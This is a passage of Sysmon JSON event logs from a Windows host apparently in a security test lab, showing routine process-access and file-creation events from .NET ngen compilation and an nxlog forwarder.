Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.154","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-00103B811000}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.154\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-00103B811000}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.154","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-00103B811000}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.169\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010346B1100}\r\nTargetProcessId: 4756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.169","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010346B1100}","TargetProcessId":"4756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.357\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.357","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.357\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.357","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:20.872\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:20.872","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:21.076\r\nProcessGuid: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nProcessId: 4692\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1254-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 07:03:21.076","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:21.076","ProcessGuid":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1254-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 07:03:21.076","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.123\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001080251000}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 